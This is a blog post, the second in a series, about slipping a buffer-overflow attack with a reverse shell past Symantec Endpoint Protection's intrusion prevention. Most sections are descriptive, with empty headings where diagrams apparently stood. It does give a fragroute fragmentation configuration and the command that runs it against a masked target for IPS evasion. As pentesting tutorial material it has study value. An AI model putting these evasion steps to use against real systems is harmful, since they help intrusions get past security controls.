This article is the second part from the "Ask and you shall receive" series. Almost a month ago I received a comment from tborland1 and he/she was kind enough to explain to me that the first article had nothing to do with bypassing IPS/IDS devices, which by the way is true. But it did explain about rapid payload delivery and it did mention that the fragroute tool (and some other tools) can be used to bypass this type of devices, so in this article I will show more specifically how to bypass the Symantec Endpoint IPS/IDS software. But the most important is that I did explain from scratch the underlying technologies and the basic concept, which by the way is that a buffer overflow is a simple string just like an SQL injection string and that you can manipulate that sting to do WHAT EVER YOU WANT with it.
But before I start talking about the buffer overflow obfuscation I will talk first about the different stages a buffer over flow goes before reaching the target machine. So lets talk first about the structure of the buffer overflow structure and the TCP/IP stages (I am reminding you that the buffer overflow is the one mentioned in Part 1).
Before the buffer overflow string reaches the target machine would have first to go through the TCP/IP stack then the operating system and then reach the vulnerable application. In our case the Buffer Overflow string mention is the one in the first part. In order to start testing the attack pattern we would test the vulnerable application to see if it is still working and then move on. So what we want to do with our scenario is as shown below:
Note: Check out that the shell is a reverse shell and that there is the Host IPS filtering the TCP/IP encoding and the Ftp application handling of our buffer. Where host based IPS is the Symantec software version 12.
The Buffer Overflow structure
As already mention a traditional buffer overflow (a no ROP based buffer overflow) looks like this (the buffer overflow structure shown below is based on Free Float Ftp v1 buffer overflow explained in the previous article):
- About the red sections:
- About the orange sections:
- About the Aqua section:
- About the Green section:
The TCP/IP Stack structure
During the experiment we will manipulate the stack to deceive the host based IPS, more specifically we will focus in only two layers the TCP and the IP layer. The following schema show the layers we will play with:
Note: Using fragroute we will alter some TCP and IP fields to bypass the Symantec endpoint software.
The Tools for obfuscating the Buffer Overflow String
The tools I am going to use to manipulate the Buffer Structure are allocated in the Metasploit suite or are manual. More specifically I am going to use:
- Manual Encoding
The Tools for obfuscating the Buffer Overflow for the stack
This Fragroute helps the pentester to intercept, modify and rewrite the egress traffic according to the rules defined in the configuration file. By simply modifying the configuration file located at '/etc/fragroute.conf' with the following default values you can attempt to bypass your targeted IPS/IDS:
ip_frag 64 tcp_chaff paws
The fragroute tool creates a route to the server you target and all your traffic passes through fragroute - no need to configure proxy in web browsers (if you are targeting a web server).
This configuration goes in the conf file /pentest/scanners/fragroute-1.2/fragroute.conf and the command would be:
bt ~ # fragroute -f /pentest/scanners/fragroute-1.2/fragroute.conf xxx.xxx.xxx.xxx
Note: After the command is executed, just browse to the site and your traffic will be fragged!Another technique can be used in conjunction with fragroute is gzip encoding for evasion purposes.
About the Symantec Antivirus software
The following text is an extract from Mr Vikram Kumar hosted on Symantec official web site:
"Symantec Endpoint Protection IPS system is the best IPS available anywhere! I explained Symantec maintains one of the world’s most comprehensive vulnerability databases, currently consisting of more than 32,000 recorded vulnerabilities (spanning more than two decades) affecting more than 72,000 technologies from more than 11,000 vendors.You can also create your own IPS rules for your specific requirement."
Note: So you get the picture that if I bypass the HIPS of Symantec I would have defeated the worlds best HIPS.
About the Symantec intrusion prevention sub system
The following text extract was taken from the Symantec administration guide:
"The intrusion prevention system (IPS) is the Symantec Endpoint Protection client's second layer of defense after the firewall. The IPS is a network-based system that operates on every computer on which the client is installed and the intrusion prevention system is enabled. If a known attack is detected, one or more intrusion
prevention technologies can automatically block it.
The intrusion prevention system scans each packet that enters and exits computers in the network for attack signatures. Attack signatures are the packet sequences that identify an attacker’s attempt to exploit a known operating system or program vulnerability.
If the information matches a known attack, the IPS automatically discards the packet. The IPS can also sever the connection with the computer that sent the data for a specified amount of time. This feature is called active response, and it protects computers on your network from being affected in any way. The client includes the following types of IPS engines that identify attack signatures."
What I will do in this article is that I am going to focus in two different things:
- The TCP/IP Obfuscation (for handling the antivirus/antispyware)
- The Buffer Overflow Obfuscation (for handling the HIPS)
This post is getting bigger and bigger so I will brake it to a third part hope you enjoy when is finished.
To be continued...